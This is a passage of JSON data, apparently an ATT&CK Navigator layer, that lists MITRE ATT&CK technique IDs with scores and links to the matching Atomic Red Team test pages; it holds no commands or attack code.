Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View 